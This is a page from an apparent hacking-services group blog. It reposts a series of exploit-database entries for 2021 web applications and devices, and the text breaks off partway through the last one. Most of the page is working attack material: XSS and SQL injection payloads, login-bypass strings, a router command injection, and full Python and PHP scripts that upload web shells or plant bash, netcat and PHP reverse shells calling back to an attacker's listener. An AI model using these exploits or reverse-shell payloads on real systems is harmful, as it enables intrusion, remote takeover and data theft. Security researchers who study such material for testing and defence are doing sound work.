Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863124995

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276

1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
HireHackking 
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275

1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue

2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
HireHackking 
# Exploit Title: WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 06-08-2021
# Exploit Author: Nosa Shandy (Apapedulimu)
# Vendor Homepage: https://translatepress.com/
# Software Link: https://wordpress.org/plugins/translatepress-multilingual/ 
# Reference: https://wpscan.com/vulnerability/b87fcc2f-c2eb-4e23-9757-d1c590f26d3f
# Version: 2.0.6 
# Tested on: macOS 11.4
# CVE : CVE-2021-24610

Description:
The plugin does not implement a proper filter on the 'translated' parameter when input to the database. The 'trp_sanitize_string' function only check the "<script></script>" with the preg_replace, the attacker can use the HTML Tag to execute javascript.

Step To Reproduce:
1. Go to http://localhost:8888/wordpress/?trp-edit-translation=true
2. Input Gettext String
3. Input the payload such as <img src=x onerror=alert(4)>
4. Save, The payload will be executed.
5. Look on the homepage will be affected.

Video : https://drive.google.com/file/d/1PnvjHuKCvjmom6xz_sxNLBu3jixCiHy_/view?usp=sharing
HireHackking 
# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
# Date: 27/09/2021
# Exploit Author: shinris3n
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

'''
This Python 3 implementation is based on the original (Python 2) exploit code developed by 
Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec.  The following modifications were made:

1 - Made required changes to print and socket commands for Python 3 compatibility.
1 - Changed the default payload to a basic bash reverse shell script and added a netcat option.
2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.
3 - Added a payload that can be used for testing remote command execution and connectivity.
4 - Added payload and listener information output based on payload selection and user input.
5 - Added execution output clarifications and additional informational comments throughout the code.

@shinris3n
https://twitter.com/shinris3n
https://shinris3n.github.io/
'''

#!/usr/bin/python3

import socket
import sys
import time

# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 4:
    sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0])
    sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])
    sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n")
    sys.exit(1)

remote_ip = sys.argv[1]
local_ip = sys.argv[2]
port = sys.argv[3]

# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)
payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login
#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell
#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only

print ("[+]Payload Selected (see script for more options): ", payload)
if '/bin/bash' in payload:
    print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)


def recv(s):
        s.recv(1024)
        time.sleep(0.2)

try:
    print ("[+]Connecting to James Remote Administration Tool...")
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.
    s.recv(1024)
    s.send((user + "\n").encode('utf-8'))
    s.recv(1024)
    s.send((pwd + "\n").encode('utf-8'))
    s.recv(1024)
    print ("[+]Creating user...")
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))
    s.recv(1024)
    s.send("quit\n".encode('utf-8'))
    s.close()

    print ("[+]Connecting to James SMTP server...")
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.
    s.send("ehlo team@team.pl\r\n".encode('utf-8'))
    recv(s)
    print ("[+]Sending payload...")
    s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))
    recv(s)
    s.send("data\r\n".encode('utf-8'))
    recv(s)
    s.send("From: team@team.pl\r\n".encode('utf-8'))
    s.send("\r\n".encode('utf-8'))
    s.send("'\n".encode('utf-8'))
    s.send((payload + "\n").encode('utf-8'))
    s.send("\r\n.\r\n".encode('utf-8'))
    recv(s)
    s.send("quit\r\n".encode('utf-8'))
    recv(s)
    s.close()
    print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")
    if '/bin/bash' in payload:
        print ("[+]Don't forget to start a listener on port", port, "before logging in!")
except:
    print ("Connection failed.")
HireHackking 
# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
# Date: 2/15/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip
# Version: 1.3.1
# Tested on: Windows 10
# CVE: CVE-2021-24287

1. Description:
The tab parameter in the Admin Panel is vulnerable to XSS.

2. Proof of Concept:
wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
HireHackking 
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2/3/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
# Version: 1.3.0
# Tested on: Windows 10
# CVE: CVE-2021-24286

1. Description:
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.

2. Proof of Concept:
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
HireHackking 
# Exploit Title: Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code
# Version: 1
# Tested on: Ubuntu

import requests
from bs4 import BeautifulSoup
import sys
import random
import string
import time
 
if len(sys.argv) != 4:
    print("[~] Usage : python3 exploit.py localhost ip port")
    exit()
 
site = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>"

letters = string.ascii_lowercase
name = ''.join(random.choice(letters) for i in range(5)) 

def LoginAndShellUpload():
    login = 'http://'+site+':80/storage/classes/Login.php?f=login'
    session = requests.session()
    post_data = {"username": "' OR 1=1-- -", "password": "aa"}
    user_login = session.post(login, data=post_data)
    cookie = session.cookies.get_dict()

    print('[+]Success login')
    print('[+]Try Shell upload')
    time.sleep(2)
    #shell upload
    url = 'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings'
    cookies = cookie
    headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------246884504016047375913085888751", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/storage/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
    data = "-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management System - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nSURMS - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"cover\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n"
    requests.post(url, headers=headers, cookies=cookies, data=data)
    print('[+]Success!')
    print('[+]Getting reverse shell')
    time.sleep(2)


def RCE():
    
    path = 'http://'+site+'/storage/uploads/'
    html_text = requests.get(path).text
    soup = BeautifulSoup(html_text, 'html.parser')
    for link in soup.find_all('a'):
        data = link.get('href')
        with open('shell_location.txt', 'w') as f:
            f.write(data)
        
    path2 = 'shell_location.txt'
    shell_file = open(path2,'r')
    shell = shell_file.readline()

    r = requests.get('http://'+site+'/storage/uploads/'+shell)
    print(r.text)
    print('[+]Hacked!')



LoginAndShellUpload()
RCE()
HireHackking 
# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation
# Date: 10-08-2021
# Exploit Author: Leonardo Nicolas Servalli
# Vendor Homepage: www.mitrastar.com
# Platform: Mistrastar router devices GPT-2541GNAC-N1 (HGU)
# Tested on: Firmware BR_g3.5_100VNZ0b33
# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md

Description:

----------

# Mitrastar GPT-2541GNAC-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).

# The command “deviceinfo show file <path>” is used from reduced CLI to show files and directories. Because this command do not handle correctly special characters, is possible to insert a second command as a parameter on the <path> value. By using “&&/bin/bash” as parameter value we can spawn a bash console, as seen on the next example:


Exploit:
--------

> deviceinfo show file &&/bin/bash

# This command will spawn a full interoperable bash console with root privileges.
HireHackking 
# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
# Date: 28.09.2021
# Exploit Author: Murat
# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
# Version: 1.0
# Tested on: Windows 10

# Pharmacy Point of Sale System v1.0 SQLi


GET /pharmacy/view_product.php?id=-1 HTTP/1.1
Host: localhost
Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6
Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Connection: close


POC:
https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1--

-----------------------------------------------------------------------

#Other parameters with sql injection vulnerability;


==> /pharmacy/?date_from=&date_to=1'"&page=sales_report

==> /pharmacy/?date_from=1'"&date_to=&page=sales_report

==> /pharmacy/manage_stock.php?expiry_date=01/01/1967&id=-1'&product_id=1&quantity=1&supplier_id=1

==> GET /pharmacy/view_receipt.php?id=1'"&view_only=true

==> /pharmacy/manage_product.php?id=-1'

==> POST /pharmacy/Actions.php?a=save_stock

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"


------------YWJkMTQzNDcw
Content-Disposition: form-data; name="supplier_id"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="product_id"

2'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="quantity"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="expiry_date"


==> POST /pharmacy/Actions.php?a=save_product HTTP/1.1

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id"

5'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="product_code"

94102'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="category_id"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="name"

pHqghUme'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="price"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="description"

1'"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="status"

0'"
------------YWJkMTQzNDcw--
-
HireHackking 
# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 29.09.2021
# Exploit Author: pussycat0x
# Vendor Homepage: https://www.cmsimple.org/
# Version: 5.4
# Tested on: ubuntu-20.04.1

import argparse
from bs4 import BeautifulSoup
from argparse import ArgumentParser
import requests
parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport')
rparser = parser.add_argument_group('required argument')
rparser.add_argument('-url','--host', type=str, help='target domain',required=True)
rparser.add_argument('-u' ,'--username', type=str, help='', required=True)
rparser.add_argument('-p','--password',type=str,help='', required=True)
rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True)
rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True)
args= parser.parse_args()
#url ='192.168.1.106'
s = requests.Session()

def main():
	try:
		
		url =(args.host)
		payload = {
		'user':args.username,
		'passwd':args.password,
		'submit': 'Login',
		'login':'true',
		}
		login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload)
		if login.status_code == 200:
			print('Exploit Completed')
		else:
			print("Invalid Credential")
		cook =(login.cookies.get_dict())
		temp = s.get(url +'/?file=template&action=edit', cookies=cook)
		soup = BeautifulSoup(temp.text, 'lxml')
		csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value']
		#<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");		
		rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"""
		rev2=(args.lhost)
		rev3=(args.lport)
		rev4=""" 0>&1'");"""
		php =(rev+rev2+'/'+rev3+rev4)
		revpayload = {
		'cmsimpleDataFileStored':'cmsimpleDataFileStored',
		'csrf_token':csrfToken,
		'text':php,
		'file':'template',
		'action':'save',
		}
		shell = s.post(url +'/',cookies=cook , data=revpayload)
		exec = s.get(url+'/')
		exit()
	except:
		pass
main()
HireHackking 
# Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - SQL Injection Authentication Bypass
# Date: 29-09-2021
# Exploit Author: sudoninja
# Vendor Homepage: https://phpgurukul.com
# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
# Version: 1.0
# Tested on: XAMPP / Windows 10

Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/ccms/index.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step4 – Change the username to ' OR 1 -- -  and password to ccms
Step 5 – Click forward and now you will be logged in as admin.

POC 

POST /ccms/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/ccms/
Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du
Upgrade-Insecure-Requests: 1

username='%20OR%201%20--%20-&password=ccms&login=
HireHackking 
# Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)
# Date: 9/24/2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
# CVE : CVE-2021-40310

OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter.

1. Login as "teacher".

2. Navigate to (take attendance): http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true

Decoded request:

GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1

3. XSS triggers

PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc
HireHackking 
# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Author: Mr.Gedik
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
# Version: 1.0
# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB


Vulnerable code controllers/add_petmanagement.php
Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],
$_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .
addslashes($_FILES["images"]["name"]));

Exploit
#############

<?php
/*
@author:mrgedik
*/
function anim($msg, $time)
{
    $msg = str_split($msg);
    foreach ($msg as $ms) {
        echo $ms;
        usleep($time);
    }
}

anim("__  __       _____          _ _ _
|  \/  |     / ____|        | (_) |
| \  / |_ __| |  __  ___  __| |_| | __
| |\/| | '__| | |_ |/ _ \/ _` | | |/ /
| |  | | |_ | |__| |  __/ (_| | |   <
|_|  |_|_(_) \_____|\___|\__,_|_|_|\_\
", 900);

echo PHP_EOL;
while(1)
{
    echo anim("Target (http://example.com/path/): ", 800);
    $target = trim(fgets(STDIN));
    echo PHP_EOL;
    if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
        echo "Not a valid URL".PHP_EOL;
    }else {
        break;
    }
}
@unlink("exp.php");
$fw = fopen("exp.php","a+");
fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');
fclose($fw);

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
$fields = [
    'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
];
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);


$response = curl_exec($ch);
@unlink("exp.php");

if(strstr($response,"success"))
{
    while(1)
    {
        echo anim("root@pwn: ", 800);
        $command = trim(fgets(STDIN));
        if($command == trim("exit"))
        {
            exit;
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        echo curl_exec($ch);
        curl_close ($ch);
    }
}else
{
    echo anim("Fail", 800);
}


?>
HireHackking 
# Exploit Title: Blood Bank System 1.0 - Authentication Bypass
# Date: 30-9-2021
# Exploit Author: Nitin Sharma (vidvansh)
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/
# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230
# Version: 1.0
# Tested on: Windows 10 , Apache , Mysql 

# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.

#Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step4 – Change the username to ' OR 1 -- -  and password to ' OR 1 -- -.
Step 5 – Click forward and now you will be logged in as admin.

# PoC:

GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/login.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

# Authentication Bypass:

# Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password => 
Username: ** Random email**			
Password: ' or 1 -- -
HireHackking 
# Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass
# Date: 30-09-2021
# Exploit Author: Nitin Sharma (Vidvansh)
# Vendor Homepage: https://code-projects.org
# Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/
# Version: 1.0
# Tested on: XAMPP / Windows 10

Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step4 – Change the username to ' OR 1 -- -  and password to ' OR 1 -- -.
Step 5 – Click forward and now you will be logged in as admin.

POC 
POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login
HireHackking 
# Exploit Title: Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 30.09.2021
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: 1.0
# Tested on: Ubuntu

import requests
from bs4 import BeautifulSoup
import sys
import random
import string
import time
 
print("""

[+] Vehicle Service Management System

[!] Auth bypass + shell upload = RCE

""")

time.sleep(2)
if len(sys.argv) != 4:
    print("[~] Usage : python3 exploit.py localhost ip port")
    exit()
 
site = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>"

letters = string.ascii_lowercase
name = ''.join(random.choice(letters) for i in range(5)) 

def LoginAndShellUpload():
    print("[+] Try Login")
    time.sleep(1)
    login = 'http://'+site+'/vehicle_service/admin/login.php'
    session = requests.session()
    post_data = {"username": "' OR 1=1-- -", "password": "aa"}
    user_login = session.post(login, data=post_data)
    cookie = session.cookies.get_dict()

    print('[+]Success login')

    print('[+]Try Shell upload')
    time.sleep(2)
    #shell upload
    url = 'http://'+site+'/vehicle_service/classes/SystemSettings.php?f=update_settings'
    cookies = cookie
    headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------34590800438205826044276614708", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/church_management/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
    data = "-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nVehicle Service Management System\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nVSMS - PHP\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"about_us\"\r\n\r\n<p style=\"text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;\">About Us</p><hr style=\"margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));\"><div id=\"Content\" style=\"margin: 0px; padding: 0px; position: relative;\"><div id=\"bannerL\" style=\"margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div id=\"bannerR\" style=\"margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div class=\"boxed\" style=\"margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: center; background-color: rgb(255, 255, 255);\"><div id=\"lipsum\" style=\"margin: 0px; padding: 0px; text-align: justify;\"></div></div></div><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non ultrices tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et malesuada fames ac ante ipsum primis in faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Praesent eleifend interdum est, at gravida erat molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at lacus vehicula, aliquam purus quis, pharetra lorem.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Proin consectetur massa ut quam molestie porta. Donec sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend id, aliquet ut libero. Nunc scelerisque 